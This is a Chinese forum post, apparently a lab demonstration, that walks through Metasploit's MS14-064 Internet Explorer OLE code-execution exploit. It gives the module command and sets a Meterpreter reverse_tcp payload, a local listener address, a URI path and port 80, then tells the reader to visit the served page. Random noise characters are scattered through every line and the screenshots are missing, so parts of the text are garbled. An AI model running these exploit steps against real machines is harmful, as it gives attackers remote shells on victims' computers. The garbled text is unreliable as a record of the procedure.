5 |( o7 e5 ]7 `7 N- E 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
- j) W# m: r+ W* g( E
2 t5 [0 i* O; a2 p8 x- }1 K; r5 C5 b0 y u! o/ W& C
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 V$ `6 V1 O7 v2 O
) ?4 ^# c8 A! I0 w2 u( p4 |/ w
v5 ~3 [6 k/ p+ u
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
: ~ w7 I2 E# V- V/ ]
) m) k/ U; A6 s1 r: h3 v' ^ k
: U) N* h1 M [5 {% ~- b! o
set AllowPowershellPrompt true! w/ a; r! k. ?" c4 M9 H8 j e% q5 A
( G) F5 i; o) p# m2 j: v, i) ]* f! A4 `, S) c
Set LHOST 192.168.0.109/ o/ s5 V* ^. d! N8 y
* B3 m$ Z* u+ p! N# M x/ c9 T
7 q, `) @5 h/ s T" O( N
set SRVHOST 192.168.0.109$ O2 j5 F9 [4 \- Y% y
& f( O6 v4 ~ b/ C" G) E" [0 E { x; E' z! H8 b2 z6 B
Set uripath share! D) P: R5 x4 i7 h7 D5 H
@, ^) I N% x/ k b" G$ x: z4 P- K; G" r: {7 p9 D0 E+ v
Set srvport 80
6 X/ A9 e1 J5 u. k( p
' u$ r) h( |8 L1 W2 Y2 E) P
% q* b' W0 C; G0 X9 P3 b7 ]
! v5 B5 w3 l# K G5 h
0 \ q; R4 m" o2 p9 _4 b3 s' t9 u& B+ }
# w2 E, B- O: D5 k& Q1 H
' ~, V. h% F2 H+ ^1 x" U6 L2 k6 o8 U& {' t: k6 Q
: L0 c& a: {5 b5 X
# m/ m8 a6 W* Q5 n% |& I" Z9 v+ q
5 I3 {6 _2 G/ z7 \# P 6 G- O. ?; ~+ d5 V$ \
% i' ^/ M1 q% U x6 f! j$ J
' r( ~ P ], z% S7 s& ]( ^ 5 h9 i+ g0 ]2 j) s9 X
0 z! Z% p: ^/ |" K6 ^' \
# q; b1 `" d6 J- l0 Y% v8 t: Y9 j
下面我们来访问本地地址如图:9 U, U9 U8 }+ G/ j0 g' v" i" `# |8 x
) B2 g, y/ @5 l; x
2 @$ x0 W! ]2 `: e3 n
* x: b' r' f. ^$ `8 [
+ {7 Q& c- ^7 U6 C/ f3 {$ N# {
, \# Q3 S8 T ~4 W
( o+ B3 j# y+ X% x/ A8 F
1 i% ~- W6 E$ n' `' R
2 J y9 I% r+ k% C
2 {* B6 ?& S6 S; R